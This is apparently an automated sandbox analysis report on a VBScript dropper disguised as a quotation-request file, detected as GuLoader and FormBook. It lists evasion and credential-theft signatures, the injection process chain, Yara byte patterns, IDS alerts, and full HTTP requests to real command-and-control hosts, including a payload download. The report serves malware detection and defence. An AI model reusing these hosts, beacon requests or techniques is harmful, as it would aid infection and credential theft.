Windows Analysis Report
#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs

Overview

General Information

Sample name:#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs
Analysis ID:1499548
MD5:62f8514c35c5abc8a6138ff3029a9af7
SHA1:9835d6cc79ed8cc63c13171cfd9d87efec7467a0
SHA256:15c644bdde76746a5798daa41fc25ac5f2a999d1fe6e11b1e47f7b328e7a1722

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found stalling execution ending in API Sleep call
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • wscript.exe (PID: 5232 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • x.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 36EFC401E52E98CD1C735D8A767A1E6D)
      • x.exe (PID: 6800 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 36EFC401E52E98CD1C735D8A767A1E6D)
        • kCwueywDTS.exe (PID: 7976 cmdline: "C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • cmdkey.exe (PID: 7296 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
            • kCwueywDTS.exe (PID: 7116 cmdline: "C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 6656 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

        System Summary

        Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", ProcessId: 5232, ProcessName: wscript.exe
        Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", ProcessId: 5232, ProcessName: wscript.exe

        AV Detection

        Source: C:\Users\user\AppData\Local\Temp\x.exe, Avira: detection malicious, Label: HEUR/AGEN.1305039
        Source: #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs, Virustotal: Detection: 12%
        Source: Yara match, File source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: unknown, HTTPS traffic detected: 199.103.62.205:443 -> 192.168.11.20:49840 version: TLS 1.2
        Source: Binary string: wntdll.pdb source: x.exe, cmdkey.exe
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Directory queried: number of queries: 1001
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_0040627E FindFirstFileA,FindClose, 2_2_0040627E
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_004063BE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 2_2_004063BE
        Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 5_2_00A4C710 FindFirstFileW,FindNextFileW,FindClose, 5_2_00A4C710
        Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 4x nop then xor eax, eax, 5_2_00A39B50
        Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 4x nop then mov ebx, 00000004h, 5_2_033304E8

        Networking

        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49842 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49851 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49850 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49846 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49858 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49855 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49854 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49852 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49866 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49856 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49860 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49871 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49864 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49879 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49914 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49900 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49905 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49884 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49913 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49872 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49920 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49924 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49862 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49925 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49922 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49867 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49928 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49868 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49870 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49874 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49886 -> 176.57.64.102:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49878 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49875 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49890 -> 76.223.54.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49904 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49887 -> 176.57.64.102:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49880 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49909 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49892 -> 76.223.54.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49916 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49882 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49896 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49888 -> 176.57.64.102:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49912 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49898 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49921 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49897 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49843 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49901 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49844 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49910 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49906 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49926 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49847 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49918 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49859 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49863 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49876 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49929 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49883 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49902 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49908 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49917 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49930 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2035065 - Severity 1 - ET MALWARE W32/Emotet.v4 Checkin Fake 404 Payload Response : 103.247.8.53:80 -> 192.168.11.20:49897
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49891 -> 76.223.54.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49932 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49934 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49933 -> 84.32.84.32:80
        Source: DNS query: www.518729.xyz
        Source: Joe Sandbox ViewIP Address: 185.230.15.3 185.230.15.3
        Source: Joe Sandbox ViewIP Address: 18.183.3.45 18.183.3.45
        Source: Joe Sandbox ViewIP Address: 76.223.54.146 76.223.54.146
        Source: Joe Sandbox ViewASN Name: VIALIS-MOSELLELocatedinMetzFranceFR VIALIS-MOSELLELocatedinMetzFranceFR
        Source: Joe Sandbox ViewASN Name: TELINEABA TELINEABA
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49840 -> 199.103.62.205:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /EiopsiA213.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.groupriam.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /enra/?wXB=brv4Erb&ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1Host: www.foundation-repair.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb HTTP/1.1Host: www.asa-malukuutara.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /o0e7/?ij60MtY=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&wXB=brv4Erb HTTP/1.1Host: www.meetfactory.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /s1mg/?ij60MtY=2QViuhW/NYaw5nxi+F1oVZq46szrrR71oUxOni/Qn+PFEj/1SakqFOMu9uwTuSiQaklPQGQrKMR1DX8jJ/FrQ8LNcsmQ9XMkBTdB/FoVvRnsRxC4QNxtOLg=&wXB=brv4Erb HTTP/1.1Host: www.518729.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb HTTP/1.1Host: www.cachsoicautdtc.bestAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /p1v4/?ij60MtY=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY=&wXB=brv4Erb HTTP/1.1Host: www.itemfilterhub.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /veti/?ij60MtY=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&wXB=brv4Erb HTTP/1.1Host: www.bullbord.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /y82c/?wXB=brv4Erb&ij60MtY=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M= HTTP/1.1Host: www.cannulafactory.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /pcjw/?ij60MtY=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&wXB=brv4Erb HTTP/1.1Host: www.7ddw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /ns8q/?wXB=brv4Erb&ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s= HTTP/1.1Host: www.home-check.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
